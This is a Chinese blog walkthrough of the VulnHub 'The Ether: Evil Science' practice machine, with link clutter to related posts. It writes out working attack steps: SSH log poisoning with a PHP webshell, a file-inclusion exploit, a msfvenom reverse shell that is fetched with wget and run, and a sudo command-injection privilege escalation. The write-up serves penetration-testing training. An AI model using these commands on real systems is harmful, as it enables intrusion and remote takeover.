【vulnhub】The Ether: Evil Science靶机

最新推荐文章于 2024-08-03 15:32:10 发布
最新推荐文章于 2024-08-03 15:32:10 发布
阅读量307 收藏 5
点赞数 4
文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wbplife/article/details/140879417
版权

靶机安装

下载地址:https://www.vulnhub.com/entry/the-ether-evilscience-v101,212/

运行环境:Vmware

信息收集

进行IP发现

nmap 192.168.93.0/24

进行端口扫描,开放了80和22端口

nmap -A 192.168.93.155 -p-

进行目录扫描

dirsearch -u http://192.168.93.155 -e *.php

网页访问IP网址

点击各处之后,发下在点击上面的ABOUT US之后,url里有着请求参数:/index.php?file=about.php

可能存在文件包含漏洞

拼接目录扫描出的目录,没有什么有用的信息,

对可能存在文件包含漏洞的页面进行burp抓包,对file参数后面进行文件爆破

标记之后,加入文件包含可能存在的文件的字典

/usr/local/apache2/logs/access_log 
/logs/access_log 
/etc/httpd/logs/access_log 
/var/log/httpd/access_log
/var/log/auth.log

发现有一个/var/log/auth.log目录存在重定向,打开响应包,里面是日志记录,并且是ssh的记录,应该是会把ssh操作记录到这里面,我们尝试利用ssh写入一句话木马,

利用ssh登录产生错误日志写入一句话木马

ssh '<?php @system($_GET[cmd]);?>'@192.168.93.155

访问执行命令

获取shell

用msfvenom生成 shell

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.93.130 LPORT=1234 -f elf > shell.elf

开启监听

#开启环境
msfconsole

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.93.130
set lport 1234
run

在下载的shell.elf文件下面开启web服务,进行远程下载

python3 -m http.server

利用前面的漏洞执行远程下载和运行,将下面的每条命令在网页里拼接在URL参数后面,回车执行就可以,继续下一条命令

/?file=/var/log/auth.log&d1no=system('wget+192.168.93.130:8000/shell.elf')%3b
/?file=/var/log/auth.log&d1no=system('chmod+%2bx+shell.elf')%3b
/?file=/var/log/auth.log&d1no=system('./shell.elf')%3b

三条命令执行完之后,发现监听成功

提权

先将获取到的shell转变为交互式的shell

#进入shell环境
shell

python -c 'import pty;pty.spawn("/bin/bash")'

查询一下sudo提权

sudo -l

发现xxxlogauditorxxx.py 可以以 root 运行。

执行命令

sudo ./xxxlogauditorxxx.py
/var/log/auth.log | whoami

wbplife
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
VulnHub渗透测试实战靶场 - THE ETHER: EVILSCIENCE
LYJ20010728的博客
08-07 1081
VulnHub渗透测试实战靶场 - THE ETHER: EVILSCIENCE环境下载THE ETHER: EVILSCIENCE靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 THE ETHER: EVILSCIENCE靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 攻击机IP地址:192.168.246.129 渗透测试 信息搜集 用netdiscover查看一下:sudo netdiscover -r 192.168.246.0
The Ether: EvilScience靶机渗透实战总结
weixin_34220834的博客
08-20 1108
近期朋友给我发了一个靶机,说是他在日志注入的时候遇到了一点小问题,让我帮忙解决一下。下载下来之后,感觉这个靶机还是挺不错的,里边有一些套路,于是整理成一篇文章,感兴趣的小伙伴可以自己尝试一下。 靶机下载https://www.vulnhub.com/entry... 信息收集首先扫描内网,发现目标主机ip arp-scan -l ...
VulnHub-The Ether: EvilScience (v1.0.1)渗透学习
我是小小白的博客
07-09 544
VulnHub-The Ether: EvilScience (v1.0.1)渗透学习 前言 靶机地址:https://download.vulnhub.com/lazysysadmin/Lazysysadmin.zip 靶机难度:中级(CTF) 靶机发布日期:2017 年 10 月 30 日 靶机描述:最近,我一直喜欢为安全社区创造黑客挑战。这一新挑战囊括了一家名为 The Ether 的公司,该公司宣布了一种显着改变人类福利的灵丹妙药。由于他们正在开发的产品的性质,CDC 对这个群体产生了怀疑。 目标:
Vulnhub靶机 The Ether: EvilScience (v1.0.1)(渗透测试详解)
2301_78721909的博客
08-03 170
Vulnhub靶机 The Ether: EvilScience (v1.0.1) 渗透测试拿shell
Vulnhub 渗透练习(八)—— THE ETHER: EVILSCIENCE
shinygod的博客
02-19 601
本地文件包含:利用 ssh 登录产生错误日志写入一句话木马(ssh ''@ip)seclists 字典:https://github.com/danielmiessler/SecListssudo -l。
Vulnhub靶机渗透:MY FILE SERVER: 1
Mysmycbx的博客
06-11 1615
靶机链接: https://www.vulnhub.com/entry/my-file-server-1,432/ 处理信息,获取开放端口 服务扫描 漏洞扫描 选择渗透方向 观察服务,发现 通过查看,这里比较感兴趣的是secure文件,但是目前没有权限,检查一下2121端口 和21端口一样没有信息。那就下一个。 通过阅读secure文件,发现了以下信息。 写入 这里尝试一下密码碰撞,登录21端口ftp,失败。 2121端口,ftp失败,22端口欧ssh,失败。 通过阅读额sshd_confi
Vulnhub靶机渗透:Raven1(超级详细)
Mysmycbx的博客
05-19 7675
发现有个contact.zip,下载下来解压,解压出contact.php,阅读源码。进入vendor文件夹,发现上面找到的phpmailer服务就存在这个文件夹里,翻找一下。在上面的内容中,我们获取到www-data权限,但通过扫描wordpress扫描到存在michael和steven两个用户,那能不能从这两个用户中,得到什么呢?下载下来一个试一试。找到了steven的用户凭据,但这里需要解密,使用john解密。,这里习惯性的使用ssh登录一下,结果成功了。扫描到后台,尝试弱密码登录,发现失败。
EtherType :以太网类型字段及值
天行健,君子以自强不息
04-28 2815
Ethernet II即DIX 2.0:Xerox与DEC、Intel在1982年制定的以太网标准帧格式。Cisco名称为:ARPAEthernet II类型以太网帧的最小长度为64字节(6+6+2+46+4),最大长度为1518字节(6+6+2+1500+4)。其中前12字节分别标识出发送数据帧的源节点MAC地址和接收数据帧的目标节点MAC地址。(注:ISL封装后可达1548字节,802.1Q封...
EtherType:以太网类型字段
快乐小蜘蛛
11-29 1644
EtherType 是以太帧里的一个字段,用来指明应用于帧数据字段的协议。根据 IEEE802.3,Length/EtherType 字段是两个八字节的字段,含义两者取一,这取决于其数值。在量化评估中,字段中的第一个八位字节是最重要的。而当字段值大于等于十进制值 1536 (即十六进制为 0600)时, EtherType 字段表示为 MAC 客户机协议(EtherType 解释)的种类。该字段的
Vulnhub靶机Wakanda渗透测试攻略
10-15 3840
前言 Wakanda是一个新的交易市场网站,很快会上线了。你的目标是通过黑客技术找到“振金”的确切位置。 页首配图 本vulnhub靶机环境由xMagass开发,并托管于Vulnhub,这台靶机上包含了很多很酷的技巧。 百度网盘下载地址: 链接:https://pan.baidu.com/s/1xwr1li8sJ-Yc7h_jOtVOcw 密码:aixl 难度级别:中级。 用virtualbox导...
ether:Monad变形金刚和职业
03-03
"ether" 是一个专门针对Haskell的库,它为开发者提供了标记的Monad转换器(Monad Transformers)和类的扩展,旨在让这些工具更加灵活和兼容。 标题中的“Monad变形金刚”是对Monad Transformer的一种形象化的比喻。...
ether:使用ssh的在线商店
05-18
醚 使用ssh的在线商店
offline-ether:广播离线以太坊交易并查看地址信息
05-16
离线以太运行测试: $ ./gradlew test UI测试(首先连接设备) ./gradlew connectedAndroidTest 该应用程序允许用户从气隙计算机上签署交易。 它的工作原理是允许用户使用相机扫描QR码并自动广播交易。...
ether:Unity软件包,用于可调制并具有各种效果的信号变量
02-21
Ether是专为Unity游戏引擎设计的一个软件包,它专注于提供可调制且具有各种效果的信号变量。在Unity中,信号变量(或事件系统)通常用于实现组件间的通信,允许不同部分的游戏逻辑相互触发和响应特定事件。这个...
ether-converter:以太单位转换器
05-30
以太转换器以太单位转换器演示安装npm install ether-converter入门 const convert = require ( 'ether-converter' )const result = convert ( 1 , 'ether' )console . log ( JSON . stringify ( result , null , 2 ...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8362
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 1748
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
读零信任网络:在不可信网络中构建安全系统07设备信任
lyingSeven的博客
08-03 610
设备安全
数理方法习题 前六章.pdf
最新发布
08-03
数理方法习题 前六章
Protocols in frame: eth:ethertype:ip:icmp:data
05-24
这是一个网络数据包的协议栈,其中包含了以下协议: - Ethernet (eth):数据链路层协议,用于在本地网络中传输数据帧。 - Ethertype:以太网类型,用于标识上层协议类型,例如IP、ARP等。 - IP:网络层协议,用于在网络中传输数据包。 - ICMP:Internet控制报文协议,用于在IP网络中传递控制消息。 - Data:应用层数据,例如HTTP请求或DNS查询等。 在这个协议栈中,数据从应用层开始,逐层封装,最终被发送到物理层进行传输。当数据到达接收端时,它会被一层一层地解封,直到应用层可以读取数据。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值